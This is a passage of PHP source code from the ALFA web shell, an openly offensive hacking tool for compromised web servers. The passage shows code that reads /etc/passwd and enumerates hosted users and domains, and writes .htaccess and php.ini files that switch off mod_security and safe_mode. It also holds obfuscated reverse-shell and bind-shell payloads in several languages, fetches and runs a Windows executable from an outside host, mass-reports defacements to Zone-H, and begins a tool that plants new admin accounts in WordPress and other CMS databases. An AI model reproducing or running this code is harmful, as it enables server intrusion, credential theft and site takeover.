</a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,\\\'ini\\\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,\\\'pl\\\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,\\\'passwd\\\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,\\\'users\\\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,null,\\\'valiases\\\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,null,null,null,\\\'domains\\\')">| Get-Domains | </a></center></h3>\';\r\nif(!empty($_POST[\'alfa8\']) && isset($_POST[\'alfa8\']) == \'domains\'){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\necho __pre();\r\n$solevisible9 = _alfa_file(\'/etc/named.conf\');\r\nif(is_array($solevisible9)){\r\nforeach($solevisible9 as $solevisible13){\r\nif(@eregi(\'zone\',$solevisible13)){\r\npreg_match_all(\'#zone "(.*)"#\',$solevisible13,$solevisible14);\r\nif(strlen(trim($solevisible14[1][0])) > 2){\r\necho $solevisible14[1][0].\'<br>\';\r\n}}}\r\n}\r\n}else{\r\necho __pre();\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nif(is_array($users)){\r\nforeach($users as $boz){\r\n$dom = explode(":",$boz);\r\necho $dom[0]."\\n";}}}}\r\nif(!empty($_POST[\'alfa6\']) && isset($_POST[\'alfa6\']) == \'valiases\'){\r\necho \'\r\n<form onsubmit="g(\\\'safe\\\',null,null,null,null,null,null,\\\'valiases\\\',this.site.value,null,\\\'>>\\\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>\';\r\nif(isset($_POST[\'alfa9\']) && $_POST[\'alfa9\'] == \'>>\'){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\n$site = trim($_POST[\'alfa7\']);\r\n$rep = str_replace(array("https://","http://","www."),"",$site);\r\n$user = "";\r\nif(function_exists("posix_getpwuid") && function_exists("fileowner")){\r\n\tif($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){\r\n\t\t$user = $user[\'name\'];\r\n\t}\r\n}else{\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\t$user = alfaEx("stat -c \'%U\' /etc/valiases/".$rep);\r\n\t}\r\n}\r\nif(!empty($user)&&$user!=\'root\'){\r\necho __pre()."<center><table border=\'1\'><tr><td><b><font color=\\"#FFFFFF\\">User: </b></font></td><td><b><font color=\\"#FF0000\\">{$user}</font></b></td></tr><tr><td><b><font color=\\"#FFFFFF\\">site: </b></font></td><td><b><font color=\\"#FF0000\\">{$rep}</font></b></td></tr></table></center>";\r\n}else {echo __pre().\'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>\';}\r\n}else{\r\n$site = trim($_POST[\'alfa7\']);\r\n$rep = str_replace(array("https://","http://","www."),"",$site);\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nforeach($users as $boz){\r\n$ex = explode(":",$boz);\r\nif($ex[0] == $rep){\r\necho __pre()."<center><table border=\'1\'>\r\n<tr><td><b><font color=\\"#FFFFFF\\">User: </b></font></td><td><b><font color=\\"#FF0000\\">".trim($ex[1])."</font></b></td></tr>\r\n<tr><td><b><font color=\\"#FFFFFF\\">site: </b></font></td><td><b><font color=\\"#FF0000\\">{$rep}</font></b></td></tr></table></center>";break;}}}}}\r\nif(!empty($_POST[\'alfa5\']) && isset($_POST[\'alfa5\'])){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\necho __pre();\r\n$i = 0;\r\nwhile ($i < 60000) {\r\n$line = @posix_getpwuid($i);\r\nif (!empty($line)) {\r\nwhile (list ($key, $vl) = each($line)){\r\necho $vl."\\n";\r\nbreak;}}$i++;}\r\n}else{echo __pre();\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nforeach($users as $boz){\r\n$user = explode(":",$boz);\r\necho trim($user[1]).\'<br>\';}}}\r\nif(!empty($_POST[\'alfa4\']) && isset($_POST[\'alfa4\'])){\r\necho __pre();\r\nif(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){\r\nfor($uid=0;$uid<60000;$uid++){\r\n$ara = @posix_getpwuid($uid);\r\nif(!empty($ara)){\r\nwhile(list ($key, $val) = each($ara)){\r\necho "$val:";\r\n}echo "\\n";}}\r\n}else{__alert(\'failed...\');}}\r\nif(!empty($_POST[\'alfa2\']) && isset($_POST[\'alfa2\'])){\r\n@__write_file($GLOBALS[\'cwd\'].".htaccess","#Generated By Sole Sad and Invisible\\n<IfModule mod_security.c>\\nSec------Engine Off\\nSec------ScanPOST Off\\n</IfModule>");\r\necho \'<center><b><big>htaccess for Apache created...!</center></b></big>\';\r\n}\r\nif(!empty($_POST[\'alfa1\'])&& isset($_POST[\'alfa1\'])){\r\n@__write_file($GLOBALS[\'cwd\']."php.ini","safe_mode=OFF\\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");\r\necho \'<center><b><big> php.ini created...!</center></b></big>\';\r\n}\r\nif(!empty($_POST[\'alfa3\']) && isset($_POST[\'alfa3\'])){\r\n@__write_file($GLOBALS[\'cwd\'].".htaccess","#Generated By Sole Sad and Invisible\\n<Files *.php>\\nForceType application/x-httpd-php4\\n</Files>\\n<IfModule mod_security.c>\\nSecFilterEngine Off\\nSecFilterScanPOST Off\\n</IfModule>");\r\necho \'<center><b><big>htaccess for Litespeed created...!</center></b></big>\';\r\n}\r\necho "<br></div>";\r\nalfafooter();\r\n}\r\nfunction __get_resource($content){\r\nreturn @gzinflate(__ZGVjb2Rlcg($content));\r\n}\r\nfunction __write_file($file, $content){\r\nif($fh = @fopen($file, "wb")){\r\nif(fwrite($fh, $content)!==false) return true;\r\n}\r\nreturn false;\r\n}\r\nfunction bcinit($evalType, $evalCode, $evalOptions, $evalArguments){\r\n$res = "<font color=\'green\'>[ Success...! ]</font>";\r\n$err = "<font color=\'red\'>[ Failed...! ]</font>";\r\nif($evalOptions!="") $evalOptions = $evalOptions." ";\r\nif($evalArguments!="") $evalArguments = " ".$evalArguments;\r\nif($evalType=="c"){\r\n$tmpdir = ALFA_TEMPDIR;\r\nchdir($tmpdir);\r\nif(is_writable($tmpdir)){\r\n$uniq = substr(md5(time()),0,8);\r\n$filename = $evalType.$uniq.".c";\r\n$path = $filename;\r\nif(__write_file($path, $evalCode)){\r\n$ext = ($GLOBALS[\'sys\']==\'win\')? ".exe":".out";\r\n$pathres = $filename.$ext;\r\n$evalOptions = "-o ".$pathres." ".$evalOptions;\r\n$cmd = "gcc ".$evalOptions.$path;\r\nalfaEx($cmd);\r\nif(is_file($pathres)){\r\nif(chmod($pathres, 0755)){\r\n$cmd = $pathres.$evalArguments;\r\nalfaEx($cmd);\r\n}else{$res = $err;}\r\nunlink($pathres);\r\n}else{$res = $err;}\r\nunlink($path);\r\n}else{$res = $err;}\r\n}\r\nreturn $res;\r\n}elseif($evalType=="java"){\r\n$tmpdir = ALFA_TEMPDIR;\r\nchdir($tmpdir);\r\nif(is_writable($tmpdir)){\r\nif(preg_match("/class\\ ([^{]+){/i",$evalCode, $r)){\r\n$classname = trim($r[1]);\r\n$filename = $classname;\r\n}else{\r\n$uniq = substr(md5(time()),0,8);\r\n$filename = $evalType.$uniq;\r\n$evalCode = "class ".$filename." { ".$evalCode . " } ";\r\n}\r\n$path = $filename.".java";\r\nif(__write_file($path, $evalCode)){\r\n$cmd = "javac ".$evalOptions.$path;\r\nalfaEx($cmd);\r\n$pathres = $filename.".class";\r\nif(is_file($pathres)){\r\nif(chmod($pathres, 0755)){\r\n$cmd = "java ".$filename.$evalArguments;\r\nalfaEx($cmd);\r\n}else{$res = $err;}\r\nunlink($pathres);\r\n}else{$res = $err;}\r\nunlink($path);\r\n}else{$res = $err;}\r\n}\r\nreturn $res;\r\n}\r\nreturn false;\r\n}\r\nfunction alfaconnect(){\r\nalfahead();\r\n$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";\r\n$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";\r\n$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";\r\n$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";\r\n$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";\r\n$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";\r\n$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Back Connect |</div><br><br>";\r\necho "<form onSubmit=\\"g(\'connect\',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\\">\r\n<div class=\\"txtfont\\">Mehtod:</div> <select name=\'cbmethod\' onChange=\'ctlbc(this);\' style=\'width:120px;\'><option value=\'back\'>Reverse Shell</option><option value=\'bind\'>Bind Port</option></select> <div class=\\"txtfont\\">Use:</div> <select name=\'selectCb\'>";\r\n$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");\r\nforeach($cbArr as $key=>$val){echo("<option value=\'{$key}\' ".($GLOBALS[\'sys\']==\'win\'?\'selected\':\'\').">{$val}</option>");}\r\necho "</select> <div id=\'bcipAction\' style=\'display:inline-block;\'><div class=\\"txtfont\\">IP:</div> <input type=\'text\' style=\'text-align:center;\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'></div> <div class=\\"txtfont\\">Port: </div> <input type=\'text\' size=\'5\' style=\'text-align:center;\' name=\'port\' value=\'2012\'> <input type=\'submit\' value=\' \'></form><p><div id=\'bcStatus\'><small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small></div></p></center></b></font><br>";\r\nif(isset($_POST[\'alfa1\'])&&!empty($_POST[\'alfa1\'])){\r\n$lang = $_POST[\'alfa1\'];\r\n$ip = $_POST[\'alfa2\'];\r\n$port = $_POST[\'alfa3\'];\r\n$arg = ($_POST[\'alfa4\']==\'bind\'?$port:$port.\' \'.$ip);\r\n$tmpdir = ALFA_TEMPDIR;\r\n$name = $tmpdir.\'/\'.$lang.uniqid().rand(1,99999);\r\n$allow = array(\'perl\',\'ruby\',\'python\',\'node\');\r\neval(\'$lan=$\'.$lang.\';\');\r\nif(in_array($lang,$allow)){\r\nif(__write_file($name,__get_resource($lan))){\r\nif(_alfa_can_runCommand(true,true)){\r\n$os = ($GLOBALS[\'sys\']!=\'win\')?\'1>/dev/null 2>&1 &\':\'\';\r\n$out = alfaEx("$lang $name $arg $os");\r\nif($out==\'\'){$out="<font color=\'green\'><center>[ Finished...! ]</center></font>";}\r\necho("<pre class=\'ml1\' style=\'margin-top:5px\'>{$out}</pre>");\r\n}\r\n}else{\r\necho("<pre class=ml1 style=\'margin-top:5px\'><font color=\'red\'><center>[ Failed...! ]</center></font></pre>");\r\n}\r\n}\r\nif($lang==\'java\'||$lang==\'c\'){\r\n$code = __get_resource($lan);\r\n$out = nl2br(bcinit($lang, $code,\'\',\'\'));\r\necho("<pre class=ml1 style=\'margin-top:5px\'><center>{$out}</center></pre>");\r\n}\r\nif($lang==\'bcwin\'){\r\n$alfa = new AlfaCURL();\r\n$s = $alfa->Send(\'http://solevisible.com/bc/windows.exe\');\r\n$tmpdir = ALFA_TEMPDIR;\r\n$f = @fopen($tmpdir.\'/bcwin.exe\',\'w+\');\r\n@fwrite($f, $s);\r\n@fclose($f);\r\n$out = alfaEx($tmpdir."/bcwin.exe ".$_POST[\'alfa2\']." ".$_POST[\'alfa3\']);\r\n}\r\nif($lang==\'php\'){\r\necho "<pre class=ml1 style=\'margin-top:5px\'>";\r\n$code = __get_resource($lan);\r\nif($code!==false){\r\n$code = "\\$target = \\"".$arg."\\";\\n".$code;\r\neval($code);\r\necho("<center><font color=\'green\'>[ Finished...! ]</font></center>");\r\n}\r\necho "</pre>";\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfazoneh(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nif(!function_exists(\'curl_version\')){\r\necho "<pre class=ml1 style=\'margin-top:5px\'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";\r\n}\r\n$hackmode = array(\'known vulnerability (i.e. unpatched system)\',\'undisclosed (new) vulnerability\',\'configuration / admin. mistake\',\'brute force attack\',\'social engineering\',\'Web Server intrusion\',\'Web Server external module intrusion\',\'Mail Server intrusion\',\'FTP Server intrusion\',\'SSH Server intrusion\',\'Telnet Server intrusion\',\'RPC Server intrusion\',\'Shares misconfiguration\',\'Other Server intrusion\',\'SQL Injection\',\'URL Poisoning\',\'File Inclusion\',\'Other Web Application bug\',\'Remote administrative panel access bruteforcing\',\'Remote administrative panel access password guessing\',\'Remote administrative panel access social engineering\',\'Attack against administrator(password stealing/sniffing)\',\'Access credentials through Man In the Middle attack\',\'Remote service password guessing\',\'Remote service password bruteforce\',\'Rerouting after attacking the Firewall\',\'Rerouting after attacking the Router\',\'DNS attack through social engineering\',\'DNS attack through cache poisoning\',\'Not available\',\'Cross-Site Scripting\');\r\n$reason = array(\'Heh...just for fun!\',\'Revenge against that website\',\'Political reasons\',\'As a challenge\',\'I just want to be the best defacer\',\'Patriotism\',\'Not available\');\r\necho \'\r\n<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>\r\n<form action="" method="post" onsubmit="g(\\\'zoneh\\\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\\\'>>\\\'); return false;">\r\n<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />\r\n<br>\r\n<select id="text" name="hackmode" style="width:400px;">\';\r\n$x=1;\r\nforeach($hackmode as $mode){echo(\'<option style="background-color: rgb(F, F, F);" value="\'.$x.\'">\'.$mode.\'</option>\');$x++;}\r\necho \'</select><br><select id="text" name="reason" style="width:200px;">\';\r\n$x=1;\r\nforeach($reason as $mode){echo(\'<option style="background-color: rgb(F, F, F);" value="\'.$x.\'">\'.$mode.\'</option>\');$x++;}\r\necho \'</select><br>\r\n<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>\r\n<p><input type="submit" value=" " name="go" /></p>\r\n</form></center>\';\r\nif($_POST[\'alfa5\'] && $_POST[\'alfa5\'] == \'>>\'){\r\nob_start();\r\n$hacker = $_POST[\'alfa1\'];\r\n$method = $_POST[\'alfa2\'];\r\n$neden = $_POST[\'alfa3\'];\r\n$site = $_POST[\'alfa4\'];\r\nif(empty($hacker)){\r\ndie (__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");\r\n}elseif($method == "------------------------------------SELECT-------------------------------------"){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");\r\n}elseif($neden == "------------------------------------SELECT-------------------------------------"){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");\r\n}elseif(empty($site)){\r\ndie(__pre()."<center><b><font color =\\"#FF0000\\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");\r\n}\r\n$i = 0;\r\n$sites = explode("\\n", $site);\r\n$alfa = new AlfaCURL();\r\nwhile($i < count($sites)){\r\nif(substr($sites[$i], 0, 4) != "http"){\r\n$sites[$i] = "http://".$sites[$i];\r\n}\r\n$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);\r\n++$i;\r\n}\r\necho __pre()."<center><font color =\\"#00A220\\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfapwchanger(){\r\nalfahead();\r\n\r\necho \'<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>\r\n<center><h3>\';\r\n$vals = array(\'WordPress\' => array(\'wp\',2),\'Joomla\' => array(\'joomla\',3),\'vBulletin\' => array(\'vb\',5),\'phpBB\' => array(\'phpbb\',6),\'WHMCS\' => array(\'whmcs\',7),\'MyBB\' => array(\'mybb\',8),\'Php Nuke\' => array(\'nuke\',9),\'Drupal\' => array(\'drupal\',10),\'SMF\' => array(\'smf\',11));\r\nAlfa_Create_A_Tag(\'pwchanger\',$vals);\r\necho \'</h3></center>\';\r\nif(isset($_POST[\'alfa1\'])&&$_POST[\'alfa1\']==\'wp\'){\r\n\r\necho __pre().\'<center><center><div class="txtfont_header">| WordPress |</div>\r\n<p>\'.getConfigHtml(\'wp\').\'</p><form onSubmit="g(\\\'pwchanger\\\',null,\\\'wp\\\',\\\'>>\\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\',\'id\'=>\'db_host\', \'inputName\' => \'localhost\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'id\'=>\'db_name\',\'inputName\' => \'database\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'id\'=>\'db_user\',\'inputName\' => \'username\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'id\'=>\'db_pw\',\'inputName\' => \'password\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix\', \'id\'=>\'db_prefix\',\'inputName\' => \'prefix\', \'inputValue\' => \'wp_\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin User\', \'inputName\' => \'admin\', \'inputValue\' => \'admin\', \'inputSize\' => \'50\'),\r\n \'td7\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Pass\', \'inputName\' => \'kh\', \'inputValue\' => \'solevisible\', \'inputSize\' => \'50\', \'disabled\' => true),\r\n \'td8\' =>\r\n array(\'color\' => \'FF0000\', \'tdName\' => \'Admin Email\', \'inputName\' => \'email\', \'inputValue\' => \'solevisible@fbi.gov\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho \'<p><input value=" " name="send" type="submit"></p></form>\';\r\nif ($_POST[\'alfa2\'] && $_POST[\'alfa2\'] == \'>>\'){\r\n$localhost = $_POST[\'alfa3\'];\r\n$database = $_POST[\'alfa4\'];\r\n$username = $_POST[\'alfa5\'];\r\n$password = 